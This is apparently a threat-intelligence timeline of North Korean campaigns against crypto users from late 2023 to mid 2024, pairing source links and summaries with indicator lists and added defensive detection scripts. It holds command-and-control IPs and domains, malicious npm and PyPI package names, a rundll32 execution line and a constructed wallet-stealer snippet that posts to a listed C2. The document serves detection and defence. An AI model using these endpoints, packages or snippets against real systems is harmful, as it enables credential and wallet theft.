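def flag_download(user_agent: str, content_type: str, body: bytes) -> List[str]:
    """Reasons to treat one HTTP download as suspicious; empty list means none seen."""
    reasons = []
    if user_agent == STATIC_UA:
        reasons.append("static User-Agent %r" % STATIC_UA)
    if content_type.lower().startswith("image/png"):
        reasons.extend("PNG body: " + p for p in png_anomalies(body))
    return reasons


if __name__ == "__main__":
    # Constructed download: the static UA fetching a PNG with 16 bytes appended.
    print(flag_download(STATIC_UA, "image/png", build_png() + b"\x00" * 16))
```

Run over proxy captures, the User-Agent match alone is cheap and precise; the chunk walk is what catches the same payload once the operators change the string.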

Korean gov’t officials targeted by North’s ‘journalist’ crypto hackers

Date:: 2023-11-22 URL:: https://protos.com/korean-govt-officials-targeted-by-norths-journalist-crypto-hackers/ https://koreajoongangdaily.joins.com/news/2023-11-22/national/northKorea/Norths-hackers-pose-as-officials-journalists-to-steal-info-and-crypto/1919045 Tags:: Details:: Indicators::

Operation Dream Magic, MagicLine4NX Hackers use zero-day in supply-chain attack

Date:: 2023-11-24 URL:: https://asec.ahnlab.com/en/57736/ https://bleepingcomputer.com/news/security/uk-and-south-korea-hackers-use-zero-day-in-supply-chain-attack/ https://documentcloud.org/documents/24174869-rok-uk-joint-cyber-security-advisoryeng https://asec.ahnlab.com/wp-content/uploads/2023/10/20231013_Lazarus_OP.Dream_Magic.pdf Tags:: CVE Details:: Indicators::

Crypto Theft macOS RustBucket Droppers Pivot to Deliver KandyKorn Payloads

Date:: 2023-11-27 URL:: https://sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/ https://x.com/KSeznec/status/1717542794942660771 Tags:: RustBucket, KandyKorn Details::

  • North Korean-aligned threat actors targeting macOS have had a busy 2023, with two major campaigns noted so far: RustBucket and KandyKorn. The initial RustBucket campaign used a second-stage malware, dubbed ‘SwiftLoader’, which functioned externally as a PDF Viewer for a lure document sent to targets. While victims viewed the lure, SwiftLoader retrieved and executed a further stage malware written in Rust. The KandyKorn campaign, meanwhile, was an elaborate multi-stage operation targeting blockchain engineers of a crypto exchange platform. Python scripts were used to drop malware that hijacked the host’s installed Discord app, and subsequently delivered a backdoor RAT written in C++ dubbed ‘KandyKorn’.
  • Research by Elastic published in early November 2023 described a sophisticated intrusion by DPRK-aligned threat actors. The compromise involved a five-stage attack that began with social engineering via Discord to trick targets into downloading a malicious Python application disguised as a cryptocurrency arbitrage bot, a popular tool among crypto traders. The Python application was distributed as Cross-Platform Bridges.zip and contained multiple benign Python scripts. We summarize the previous research into KandyKorn as follows:
  • Written in C++, SUGARLOADER checks for the existence of a configuration file at /Library/Caches/com.apple.safari.ck and downloads it from a remote C2 if missing. The C2 address is hardcoded into the FinderTools script and passed as an execution argument to the SUGARLOADER binary on the command line.
  • In the intrusion seen by Elastic, the C2 used by FinderTools was hosted on the domain tp-globa[.]xyz.
  • SUGARLOADER uses this to retrieve and execute the KANDYKORN remote access trojan in-memory via NSCreateObjectFileImageFromMemory and NSLinkModule. This technique has been used previously in North Korean macOS malware, starting with UnionCryptoTrader back in 2019.
  • A number of RustBucket variants have since been sighted. Additionally, several variations of the Swift-based stager, collectively dubbed SwiftLoader, have come to light over the last few months. Indicators::
  • docs-send[.]online/getBalance/usdt/ethereum
  • drive.google[.]com/file/d1KW5nQ8MZccug6Mp4QtKyWLT3HIZzHNIL2
  • on-global[.]xyz/Of56cYsfVV8/OJITWH2WFx/Jy5S7hSx0K/fP7saoiPBc/A%3D%3D
  • tp-globa[.]xyz/OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC
  • swissborg[.]blog/zxcv/bnm
  • 23.254.226[.]90
  • 104.168.214[.]151
  • 142.11.209[.]144
  • 192.119.64[.]43
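The Elastic REF7001 URL, the URL reported on Reddit (group.pro-tokyo[.]top) and the on-global[.]xyz URL in this list share one path shape: alphanumeric segments of 11, 10, 10 and 10 characters followed by a short tail, with the fourth segment beginning fP7sa. As an added example, not from Elastic or SentinelOne, the Python below turns that shape into a structural matcher so that URLs on hosts not yet listed can be surfaced from proxy or DNS logs. The segment lengths and the fP7sa prefix are derived only from the samples on this page; treat them as a hunting heuristic, not a confirmed description of the C2 protocol.

```python
import re
from typing import Dict, Iterable, List
from urllib.parse import unquote, urlsplit

ALNUM = r"[A-Za-z0-9]"
# Five path segments: 11, 10, 10, 10 alphanumerics and a short tail. The leading
# "//" seen in two of the samples is tolerated rather than required.
PATH_RE = re.compile(
    rf"^/+(?P<s1>{ALNUM}{{11}})/(?P<s2>{ALNUM}{{10}})/(?P<s3>{ALNUM}{{10}})/"
    rf"(?P<s4>{ALNUM}{{10}})/(?P<tail>[^/]{{1,8}})/?$"
)
SHARED_S4_PREFIX = "fP7sa"   # common prefix of the fourth segment in all three samples


def refang(ioc: str) -> str:
    """Undo the defanging conventions used in this document."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def classify_url(url: str) -> Dict[str, object]:
    u = refang(url.strip())
    if "://" not in u:
        u = "http://" + u
    parts = urlsplit(u)
    m = PATH_RE.match(parts.path)
    if not m:
        return {"url": url, "match": False}
    return {
        "url": url,
        "match": True,
        "host": parts.hostname,
        "segments": [m["s1"], m["s2"], m["s3"], m["s4"]],
        "tail": unquote(m["tail"]),
        "shared_prefix": m["s4"].startswith(SHARED_S4_PREFIX),
    }


def matching_urls(urls: Iterable[str]) -> List[Dict[str, object]]:
    return [r for r in (classify_url(u) for u in urls) if r["match"]]


# The URLs as they appear on this page (Elastic, Reddit and SentinelOne lists).
SAMPLE_URLS = [
    "tp-globa[.]xyz//OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC",
    "group.pro-tokyo[.]top//OcRLY4xsFlN/vMZrXIWONw/6OyCZl89HS/fP7savDX6c/bfC",
    "on-global[.]xyz/Of56cYsfVV8/OJITWH2WFx/Jy5S7hSx0K/fP7saoiPBc/A%3D%3D",
    "docs-send[.]online/getBalance/usdt/ethereum",
    "drive.google[.]com/file/d1KW5nQ8MZccug6Mp4QtKyWLT3HIZzHNIL2",
    "swissborg[.]blog/zxcv/bnm",
]

if __name__ == "__main__":
    for hit in matching_urls(SAMPLE_URLS):
        print(hit["host"], hit["segments"], repr(hit["tail"]), "shared prefix:", hit["shared_prefix"])
```

The tail of the on-global[.]xyz sample decodes to "A==", i.e. padding with no payload, which suggests the last segment is a base64-encoded parameter; the other two tails ("bfC") are too short to be sure, so the matcher only records the decoded value.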

FIOD + US Seizes Sinbad Crypto Mixer

Date:: 2023-11-29 URL:: https://bleepingcomputer.com/news/security/us-seizes-sinbad-crypto-mixer-used-by-north-korean-lazarus-hackers/ Tags:: Details::

  • This service has been seized as part of a coordinated law-enforcement action between the Federal Bureau of Investigation, the Financial Intelligence and Investigation Service (FIOD), and the National Bureau of Investigation taken against the Sinbad.io cryptocurrency mixing service, reads the seizure message on Sinbad[.]io.
  • The Federal Bureau of Investigation has seized the service in accordance with a seizure warrant pursuant to 18 U.S.C. 981 and 982 as part of a coordinated international law-enforcement operation.
  • In addition to the clearweb site shown above, the Tor site for Sinbad is no longer operational. This indicates that the servers for the mixing service were seized by law enforcement as well. Indicators::

USG: Sanctions North Korea’s Kimsuky hacking group

Date:: 2023-11-30 URL:: https://bleepingcomputer.com/news/security/us-govt-sanctions-north-koreas-kimsuky-hacking-group/ Tags:: Kimsuky Details::

  • The Treasury Department's Office of Foreign Assets Control (OFAC) has sanctioned the North Korean-backed Kimsuky hacking group for stealing intelligence in support of the country's strategic goals. Indicators::

Crypto Country: North Korea's Targeting of Cryptocurrency

Date:: 2023-11-30 URL:: https://go.recordedfuture.com/hubfs/reports/cta-2023-1130.pdf Tags:: Details::

  • Since 2017, North Korea has greatly expanded its targeting of the cryptocurrency industry, stealing over an estimated $3 billion worth of cryptocurrency.
  • Prior to this, the regime saw previous success in stealing from financial institutions by hijacking the Society for Worldwide Interbank Financial Telecommunications (SWIFT) network.
  • However, this activity brought heavy attention from international authorities, and financial institutions responded by investing in improving their cyber defenses.
  • During the cryptocurrency bubble of 2017, when the technology reached the mainstream, North Korean cyber operators shifted their targeting from traditional finance to this new digital financial technology by first targeting the South Korean cryptocurrency market before significantly expanding their reach globally.
  • North Korean threat actors were accused of stealing an estimated $1.7 billion worth of cryptocurrency in 2022 alone, a sum equivalent to approximately 5% of North Korea’s economy or 45% of its military budget.
  • This amount is also almost 10 times more than the value of North Korea's exports in 2021, which sat at $182 million, according to the Observatory of Economic Complexity (OEC).
  • North Korean threat actors’ operations targeting the cryptocurrency industry and how they launder the stolen cryptocurrency often mirror traditional cybercriminal groups that use cryptocurrency mixers, cross-chain swaps, and fiat conversions.
  • However, state support allows North Korean threat actors to expand the scale and scope of their operations to a level not possible by traditional cybercriminal groups, with approximately 44% of stolen cryptocurrency in 2022 traced to North Korean threat actors.
  • Targeting is not limited to cryptocurrency exchanges, with individual users, venture capital firms, and alternative technologies and protocols all having been targeted by North Korean threat actors.
  • All of this activity puts anyone operating in the industry at risk of becoming a potential target of North Korean threat actors and allows the regime to continue operating and funding itself while under international sanctions.
  • Anyone operating in the cryptocurrency industry — individual users, exchange operators, and financiers with a portfolio of startups — should be aware of the potential to be targeted by North Korean threat actors.
  • Entities operating in the traditional finance space should also be on the lookout for North Korean threat group activities.
  • Once cryptocurrency is stolen and converted into fiat currency, North Korean threat actors funnel the funds between different accounts to obscure the source.
  • Oftentimes stolen identities, along with altered photos, are used to bypass anti-money-laundering and know-your-customer (AML/KYC) verification.
  • Anyone who is a victim of an intrusion linked to a North Korean threat group may have their personally identifiable information (PII) used to set up accounts to facilitate the laundering of stolen cryptocurrency.
  • As a result, companies operating beyond the cryptocurrency and traditional finance industries should also be on the lookout for North Korean threat group activity and for their data or infrastructure being used as a launch pad for further intrusions.
  • Since most intrusions by North Korean threat groups start with social engineering and a phishing campaign, organizations should train employees to monitor for this activity and implement strong multi-factor authentication such as FIDO2-compliant passwordless authentication. Indicators::

Analysis of North Korean Hackers’ Targeted Phishing Scams on Telegram

Date:: 2023-12-03 URL:: https://slowmist.medium.com/analysis-of-north-korean-hackers-targeted-phishing-scams-on-telegram-872db3f7392b Tags:: SquidSquad Details::

  • Since 2022, our team at SlowMist, using the SlowMist BTI intelligence network, discovered that the North Korean hacker group Lazarus initiated a widespread phishing operation on Telegram, specifically targeting the cryptocurrency industry. More recently, these hackers have escalated their tactics by posing as reputable investment institutions to execute phishing scams against various cryptocurrency project teams. Due to the considerable impact of these fraudulent activities, we at SlowMist have undertaken a detailed analysis. Indicators::

Alex Masmej Near Miss

Date:: 2023-12-03 URL:: https://x.com/AlexMasmej/status/1731446788136292833 Tags:: SquidSquad Details::

  • Three weeks prior to this call, a Telegram user “Chao Deng” “@/chaodeng” claiming to be from the known fund Hashkey signaled interest in investing in Showtime. I somehow remembered that fund name and thought nothing more of it. Long story short, that impersonator refused to join my Google Meet and proposed that I chat via a VPN-friendly “alternative” video link, which contained a script that I ran, like an idiot, in an effort to not be late. Indicators::

New Trojan attacking macOS users

Date:: 2023-12-05 URL:: https://securelist.com/bluenoroff-new-macos-malware/111290/ Tags:: SquidSquad, RustBucket Details::

  • We recently discovered a new variety of malicious loader that targets macOS, presumably linked to the BlueNoroff APT gang and its ongoing campaign known as RustBucket.
  • Earlier RustBucket versions spread their malicious payload via an app disguised as a PDF viewer. By contrast, this new variety was found inside a ZIP archive that contained a PDF file named “Crypto-assets and their risks for financial stability”, with a thumbnail that showed a corresponding title page. The metadata preserved inside the ZIP archive suggests the app was created on October 21, 2023.
  • Written in Swift and named EdoneViewer, the executable is a universal format file that contains versions for both Intel and Apple Silicon chips. Decryption of the XOR-encrypted payload is handled by the main function, CalculateExtameGCD. While the decryption process is running, the app puts out unrelated messages to the terminal to try and lull the analyst’s vigilance. Indicators::

Analysis of Suspected Lazarus (APT-Q-1) Attack Sample Targeting npm Package Supply Chain

Date:: 2023-12-08 URL:: https://ti.qianxin.com/blog/articles/Analysis-of-Suspected-Lazarus-APT-Q-1-Attack-Sample-Targeting-npm-Package-Supply-Chain-EN/ Tags:: Details::

  • Jade Sleet, Comebacker DLL Indicators::
  • 103.179.142.171/files/npm.mov
  • 103.179.142.171/npm/npm.mov
  • 156.236.76.9/faq/faq.asp
  • 156.236.76.9:80
  • 91.206.178.125/files/npm.mov
  • 91.206.178.125/upload/upload.asp
  • 91.206.178.125:80
  • blockchain-newtech.com
  • blockchain-newtech.com/download/download.asp
  • chaingrown.com
  • chaingrown.com/manage/manage.asp
  • preinstall.db
  • sql.tmp
  • 103.179.142.171
  • 156.236.76.9

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

Date:: 2023-12-10 URL:: https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/ Tags:: Details::

  • HazyLoad, NineRAT, BottomLoader, DLRAT Indicators::

Koda's recent DPRK IoCs

Date:: 2023-12-11 URL:: https://github.com/0xKoda/ioc-public/blob/main/ioc.json Tags:: Details:: Indicators::

Fake Developer Jobs Laced With Malware

Date:: 2023-12-20 URL:: https://blog.phylum.io/smuggling-malware-in-test-code/ Tags:: Details::

  • An npm package masquerading as a code profiler that actually installs several malicious scripts, including a cryptocurrency and credential stealer.
  • Attempted to hide the malicious code in a test file, presumably thinking that no one would bother to look for malware in test code. Indicators::

Obfuscated code a recruiter sent me

Date:: 2023-12-21 URL:: https://reddit.com/r/hacking/comments/18npzcl/comment/kecsptt/ https://x.com/unpacker/status/1737993034934169855 Tags:: DPRK-CI Details::

  • There are Extension IDs hardcoded in there that are related to crypto wallets and the JavaScript attempts to decrypt/collect that data and send it off to the server at IP 147.124.212.89:1244 using different endpoints Indicators::
  • github[.]com/SolmateD/Solmate-presale-backend/blob/9161e3ca130d1d958fd26c33191161db524c0039/src/services/routes.js#L1
  • pastebin.com/LnTRXgnM
  • text.is/JOPY
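The Reddit post above describes the shape of this stealer: hardcoded browser-extension IDs for crypto wallets plus a hardcoded IP:port it posts the collected data to. The following is an added triage script for this timeline, not the malware's code and not a published detector. It relies on one fact about Chrome extension IDs (they are exactly 32 characters drawn from a-p) and on the BeaverTail/InvisibleFerret IP:port pairs listed elsewhere on this page; `SAMPLE_STEALER_JS` and `SAMPLE_BENIGN_JS` are constructed inputs (the first extension ID is MetaMask's published Chrome ID, the second and the `/keys` path are made up).

```python
"""Static triage of a JavaScript file for the wallet-extension theft pattern.

Added example for this timeline, not the malware's code or anyone's published
detector. Heuristic: a Chrome extension ID is 32 characters in [a-p]; a stealer
targeting wallet extensions embeds such IDs as literals and exfiltrates to a
hardcoded IP:port. The sample inputs below are constructed.
"""
import re
from typing import Dict, List

EXT_ID_RE = re.compile(r"\b[a-p]{32}\b")                       # Chrome extension ID shape
IP_PORT_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}:\d{2,5}\b")  # raw IPv4:port literal

# IP:port pairs listed on this page for BeaverTail / InvisibleFerret infrastructure
KNOWN_C2 = {
    "147.124.212.89:1244", "147.124.212.146:1244", "147.124.213.11:1244",
    "147.124.213.29:1244", "147.124.214.129:1244", "147.124.214.131:1244",
    "147.124.214.237:1244", "172.86.97.80:1224", "172.86.123.35:1244",
    "67.203.7.171:1244", "67.203.7.245:1244", "91.92.120.135:3000",
    "45.61.131.218:1245", "173.211.106.101:1245",
}


def scan_js(source: str) -> Dict[str, object]:
    """Return extension-ID literals, hardcoded endpoints, known C2 hits and a verdict."""
    ext_ids: List[str] = sorted(set(EXT_ID_RE.findall(source)))
    endpoints: List[str] = sorted(set(IP_PORT_RE.findall(source)))
    known = [e for e in endpoints if e in KNOWN_C2]
    reasons: List[str] = []
    if ext_ids:
        reasons.append(f"{len(ext_ids)} extension-ID literal(s)")
    if endpoints:
        reasons.append("hardcoded endpoint(s): " + ", ".join(endpoints))
    if known:
        reasons.append("endpoint matches a C2 listed on this page")
    return {
        "extension_ids": ext_ids,
        "endpoints": endpoints,
        "known_c2": known,
        # extension IDs alone are common in browser tooling; IDs together with a
        # raw IP:port, or any known C2, is the stealer shape described above
        "suspicious": bool(ext_ids and endpoints) or bool(known),
        "reasons": reasons,
    }


# constructed sample: the stealer shape (first ID is MetaMask's real Chrome ID,
# second ID and the /keys path are invented; the IP:port is from this page)
SAMPLE_STEALER_JS = r"""
const ids = ['nkbihfbeogaeaoehlefnkodbefgpgknn', 'abcdefghijklmnopabcdefghijklmnop'];
const host = 'http://147.124.212.89:1244';
for (const id of ids) { collect(id).then(d => post(host + '/keys', d)); }
"""

# constructed sample: ordinary server code, should not trigger
SAMPLE_BENIGN_JS = r"""
const express = require('express');
const app = express();
app.listen(3000, () => console.log('listening'));
"""

if __name__ == "__main__":
    for name, src in (("stealer", SAMPLE_STEALER_JS), ("benign", SAMPLE_BENIGN_JS)):
        print(name, scan_js(src))
```

The 32-character [a-p] pattern alone will fire on legitimate browser tooling, so the verdict requires a raw IP:port next to it, or a match against the page's C2 list; treat the output as a reason to open the file, not as a conviction.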

To stem North Korea’s missiles program, White House looks to its hackers

Date:: 2023-12-22 URL:: https://politico.com/news/2023/12/21/north-korea-missiles-program-hackers-00132871 Tags:: Details::

  • Hacking, she argued, has enabled North Korea to “either evade sanctions or evade the steps the international community has taken to target their weapons proliferation … their missile regime, and the growth in the number of launches we’ve seen.”
  • Poor regulation and shoddy security in the fast-growing cryptocurrency industry, which is dominated by start-ups, make it an easy target for Pyongyang’s hackers. Because of crypto’s inbuilt privacy features and the fact that it can be sent across borders at the click of a mousepad, it also offers a powerful tool to circumvent sanctions. Indicators::

Hackers Deploying AppleSeed, Meterpreter, and TinyNuke in Latest Attacks

Date:: 2023-12-23 URL:: https://thehackernews.com/2023/12/kimsuky-hackers-deploying-appleseed.html Tags:: Kimsuky Details::

  • Nation-state actors affiliated to North Korea have been observed using spear-phishing attacks to deliver an assortment of backdoors and tools such as AppleSeed, Meterpreter, and TinyNuke to seize control of compromised machines. Indicators::

Blockchain dev's wallet emptied in job interview using npm package

Date:: 2023-12-28 URL:: https://bleepingcomputer.com/news/security/blockchain-devs-wallet-emptied-in-job-interview-using-npm-package/ https://x.com/muratctp/status/1739224777955369420 Tags:: DPRK-CI Details::

  • The Upwork job posting asks the applicant to fix bugs and resopnsiveness [sic] on website and claims to pay between $15 and $20 hourly for a task expected to take under a month. Indicators::
  • npm:: web3_nextjs
  • npm:: web3_nextjs_backend

2024

Update to November’s Crypto-Themed npm Attack

Date:: 2024-01-05 URL:: https://blog.phylum.io/update-to-novembers-crypto-themed-npm-attack/ Tags:: Details::

  • Since that initial report, we have identified nearly two dozen additional packages belonging to this still active campaign. Additionally, the QiAnXin Threat Intelligence Center released a detailed analysis of the binary involved in this campaign, conclusively linking it to a North Korean APT. With this revelation, and given that the package names were crypto-themed, it becomes increasingly apparent that the campaign’s ultimate objective was likely twofold: first, to gain persistent access to the systems of developers who installed these packages, and second, to leverage this access to infiltrate the broader organization these developers belong to—likely entities within the cryptocurrency sector. Presumably the end goal, given the recent history of North Korean hacking objectives, was to steal substantial cryptocurrency assets, thereby circumventing the heavy sanctions imposed upon them—more on that later. Indicators::
  • config-storages, web3-core-subscription, port-common, styled-beautify-components, bitcore-transactions, feather-icons-pro, port-launcher, blockchain-transactions, blockchain-contracts, chainflowpro, chainflow, cryptotransact, blockledger, erc20-testenv, puma-com, simplecointest, coincryptotest, blockchaintestenv, cryptotestenv, envision-config, envi-conf, envi-config, config-envi, dot-environment

Comprehensive Report on North Korean Hackers, Phishing Groups, and Money Laundering in 2023

Date:: 2024-01-11 URL:: https://slowmist.medium.com/comprehensive-report-on-north-korean-hackers-phishing-groups-and-money-laundering-in-2023-f3ec135ed837 Tags:: Money Laundering Details::

  • Based on publicly available information from 2023, as of June, there have been no significant cryptocurrency thefts attributed to the North Korean hacker group, Lazarus Group. Analysis of blockchain activity suggests that the Lazarus Group has primarily been engaged in laundering cryptocurrency funds stolen in 2022. This includes approximately $100 million lost in the June 23, 2022 attack on the Harmony cross-chain bridge.
  • However, subsequent developments revealed that the Lazarus Group was not only laundering stolen cryptocurrency funds. They were also actively involved in Advanced Persistent Threat (APT) attacks during their operational downtime. These covert activities precipitated the ‘Dark 101 Days’ in the cryptocurrency industry, starting from June 3. Indicators::

Funds Stolen from Crypto Platforms Fall More Than 50% in 2023, but Hacking Remains a Significant Threat as Number of Incidents Rises

Date:: 2024-01-24 URL:: https://chainalysis.com/blog/crypto-hacking-stolen-funds-2024/ Tags:: Money Laundering Details::

  • Over the last few years, cryptocurrency hacking has become a pervasive and formidable threat, leading to billions of dollars stolen from crypto platforms and exposing vulnerabilities across the ecosystem. As we revealed in last year’s Crypto Crime Report, 2022 was the biggest year ever for crypto theft with $3.7 billion stolen. In 2023, however, funds stolen decreased by approximately 54.3% to $1.7 billion, though the number of individual hacking incidents actually grew, from 219 in 2022 to 231 in 2023. Indicators::

North Korea Threat Landscape Update

Date:: 2024-01-24 URL:: https://thecyberwire.com/podcasts/microsoft-threat-intelligence/10/notes Tags:: Details::

  • The evolution of North Korean cyber operations
  • How cryptocurrency theft is used as a means to support the state
  • North Korea's unique approach to cyber operations and strategic evolution over time Indicators::

CVE-2024-21338 North Korea’s Lazarus deploys rootkit via AppLocker zero-day flaw

Date:: 2024-02-24 URL:: https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/ https://csoonline.com/article/1311082/north-koreas-lazarus-deploys-rootkit-via-applocker-zero-day-flaw.html Tags:: CVE Details::

  • CVE-2024-21338, BYOVD, FudModule
  • The vulnerability was introduced in Win10 1703 (RS2/15063) when the 0x22A018 IOCTL handler was first implemented. Older builds are not affected as they lack support for the vulnerable IOCTL. Interestingly, the Lazarus exploit bails out if it encounters a build older than Win10 1809 (RS5/17763), completely disregarding three perfectly vulnerable Windows versions. Indicators::

New Malicious PyPI Packages used by Lazarus

Date:: 2024-02-28 URL:: https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html Tags:: Details::

  • JPCERT/CC has confirmed that Lazarus has released malicious Python packages to PyPI.
  • This type of malware, called Comebacker, is the same type as that used by Lazarus to target security researchers in an attack reported by Google [1] in January 2021. The following sections describe the details of test.py.
  • In addition, the NOP code used in this sample has a unique characteristic. As shown in Figure 6, there is an instruction in the middle of the code whose encoding starts with 66 66 66 66 (stacked operand-size prefix bytes). This is often used, especially in the decode and encode functions. This characteristic is also found in other types of malware used by Lazarus, including BLINDINGCAN.
  • After test.py is XOR-decoded, it is saved as output.py and then executed as a DLL file: Indicators::
  • $ rundll32 output.py,CalculateSum
  • pycryptoenv
  • pycryptoconf
  • quasarlib
  • swapmempool
  • blockchain-newtech.com/download/download.asp
  • fasttet.com/user/agency.asp
  • chaingrown.com/manage/manage.asp
  • 91.206.178.125/upload/upload.asp
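The JPCERT/CC entry above describes the trick: test.py is not Python at all but an XOR-encoded DLL, decoded to output.py and executed with `rundll32 output.py,CalculateSum`. The report does not give the key, which is exactly the situation an analyst is in with a new sample, so the following added script (written for this timeline, not JPCERT's or Lazarus's code) brute-forces every single-byte XOR key and keeps the one that produces a valid MZ/PE header, then counts the `66 66 66 66` prefix runs the report calls out. `SAMPLE_KEY` and the minimal fake PE are constructed test data; a real sample would be passed to `scan_file`.

```python
"""Single-byte XOR brute force to expose a PE hidden in a .py file.

Added example for this timeline, not code from JPCERT/CC or from the malware.
Tries all 256 single-byte keys and keeps the first that yields an MZ header
with 'PE\\0\\0' at e_lfanew. SAMPLE_KEY and build_fake_pe() are constructed.
"""
import struct
from typing import Optional, Tuple

MZ = b"MZ"
PE_SIG = b"PE\0\0"
FAT_NOP_PREFIX = b"\x66\x66\x66\x66"   # stacked operand-size prefixes noted by JPCERT


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key."""
    return bytes(b ^ key for b in data)


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with MZ and carries 'PE\\0\\0' at e_lfanew (offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != MZ:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == PE_SIG


def find_xor_key(blob: bytes) -> Optional[Tuple[int, bytes]]:
    """Try every single-byte key; return (key, decoded) on the first PE hit, else None."""
    for key in range(256):
        decoded = xor_bytes(blob, key)
        if looks_like_pe(decoded):
            return key, decoded
    return None


def count_fat_nops(pe: bytes) -> int:
    """Count 66 66 66 66 runs; a pivot for hunting, not a signature on its own."""
    return pe.count(FAT_NOP_PREFIX)


def scan_file(path: str) -> Optional[Tuple[int, int]]:
    """Return (key, fat_nop_count) if the file XOR-decodes to a PE, else None."""
    with open(path, "rb") as fh:
        hit = find_xor_key(fh.read())
    return None if hit is None else (hit[0], count_fat_nops(hit[1]))


# --- constructed sample: a minimal fake PE, XOR-encoded with an assumed key ---
def build_fake_pe() -> bytes:
    hdr = bytearray(0x40)
    hdr[:2] = MZ
    struct.pack_into("<I", hdr, 0x3C, 0x40)            # e_lfanew points right after the DOS header
    body = PE_SIG + (FAT_NOP_PREFIX + b"\x90") * 3 + b"\x00" * 16
    return bytes(hdr) + body


SAMPLE_KEY = 0x5A                                       # assumption; the real key is not in the report
SAMPLE_TEST_PY = xor_bytes(build_fake_pe(), SAMPLE_KEY)  # stands in for the malicious test.py

if __name__ == "__main__":
    hit = find_xor_key(SAMPLE_TEST_PY)
    if hit:
        key, pe = hit
        print(f"key=0x{key:02x} pe_bytes={len(pe)} fat_nops={count_fat_nops(pe)}")
```

A single-byte key is the assumption here; if no key produces a PE, the next things to try are a multi-byte repeating key and checking whether the blob is base64 or compressed before the XOR.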

Phishing by Appointment: Suspected North Korean Hackers Target Blockchain Community Via Telegram

Date:: 2024-02-28 URL:: https://hunt.io/blog/suspected-north-korean-hackers-target-blockchain-community-via-telegram Tags:: SquidSquad Details::

  • Hunt is tracking an ongoing sophisticated phishing campaign targeting individuals in the Telegram groups focused on the blockchain and angel investing communities, specifically entrepreneurs. The tactics described below are strikingly similar to those previously attributed to the Lazarus Group, a North Korean state-sponsored threat actor. Communication begins with the actor posing as a representative of an investment company seeking business opportunities. As the conversation progresses, the victim is asked to download an AppleScript after 'technical difficulties' are encountered in setting up a meeting. Indicators::
  • IP_Request.scpt
  • 104.168.163[.]149
  • support.internal-meeting[.]site
  • 104[.]168[.]163[.]124
  • www.group-meeting[.]xyz
  • 23[.]254[.]129[.]6
  • you.alwayswait[.]online
  • 104[.]168[.]137[.]21
  • meet.cryptowave[.]capital

UN Security Council Report

Date:: 2024-03-07 URL:: https://securitycouncilreport.org/atf/cf/%7B65BFCF9B-6D27-4E9C-8CD3-CF6E4FF96FF9%7D/S%202024%20215.pdf Tags:: Kimsuky Details::

  • According to a cybersecurity company, the IP address of the Kimsuky server hosting this malware is 144.76.109.61 and the IP address of another, related server hosting the Kimsuky-controlled domain civilarys.store is 27.255.81.77.
  • Kimsuky-related email accounts associated with this campaign include luckgpu[@]gmail.com and abdulsamee7561[@]gmail.com.
  • The malicious applications were likely distributed via spearphishing or smishing. Indicators::
  • 144.76.109.61
  • 27.255.81.77
  • luckgpu[@]gmail.com
  • abdulsamee7561[@]gmail.com

The Lazarus group appears to be currently reaching out to targets via LinkedIn and spreading malware

Date:: 2024-04-20 URL:: https://x.com/malwrhunterteam/status/1781619431728123981 https://x.com/dimitribest/status/1782609281897902426 https://infosec.exchange/@spark/111621395392313256 https://x.com/BaoshengbinCumt/status/1783402882903277983 https://stackoverflow.com/questions/78328188/scam-js-code-does-this-script-install-anything-malicious-locally-if-i-ran-it-wi https://pastebin.com/2pz1iQFm https://x.com/asdasd13asbz/status/1782951380568936481 https://x.com/im23pds/status/1782984061369405878 Tags:: DPRK-CI Details::

  • InvisibleFerret, BeaverTail Indicators::
  • 147.124.212.89:1244
  • test_interview.zip

US DOJ: Disrupt Illicit Revenue Generation Efforts of Democratic People’s Republic of Korea Information Technology Workers

Date:: 2024-04-29 URL:: https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-action-disrupt-illicit-revenue-generation https://x.com/tayvano_/status/1777911893224808911 https://x.com/tayvano_/status/1777911896508887178 https://x.com/tayvano_/status/1777911898845159775 Tags:: DPRK-IT, Money Laundering Details::

  • On Oct. 17, pursuant to a court order issued in the Eastern District of Missouri, the United States seized 17 website domains used by Democratic People’s Republic of Korea (DPRK) information technology (IT) workers in a scheme to defraud U.S. and foreign businesses, evade sanctions and fund the development of the DPRK government’s weapons program. These seizures follow the previously sealed October 2022 and January 2023 court-authorized seizures of approximately $1.5 million of the revenue that the same group of IT workers collected from unwitting victims as a result of their scheme, as well as the development of public-private information-sharing partnerships that denied the IT workers access to their preferred online freelance work and payment service providers. Indicators::

How Lazarus Group laundered $200M from 25+ crypto hacks to fiat from 2020–2023

Date:: 2024-04-29 URL:: https://zachxbt.mirror.xyz/B0-UJtxN41cJhpPtKv0v2LZ8u-0PwZ4ecMPEdX4l8vE Tags:: SquidSquad, Money Laundering Details::

  • CoinBerry, Unibright, CoinMetro, Nexus Mutual, EasyFi, Bondly, Unreported hacks, MGNR, PolyPlay, bZx, Steadefi, CoinShift, Paxful and Noones accounts Indicators::

Recruitment trap for blockchain practitioners: Analysis of suspected Lazarus (APT-Q-1) stealing operations

Date:: 2024-05-10 URL:: https://mp.weixin.qq.com/s/84lUaNSGo4lhQlpnCVUHfQ Tags:: DPRK-CI Details::

  • Contagious Interview, BeaverTail, InvisibleFerret
  • Attackers create false identities on work platforms (such as LinkedIn, Upwork, Braintrust, etc.), posing as employers, independent developers, or startup founders, and post job listings offering lucrative pay or urgent tasks. The work is usually software development or bug fixing. Indicators::
  • Github:: plannet-plannet
  • Github:: bmstoreJ
  • Github:: CodePapaya
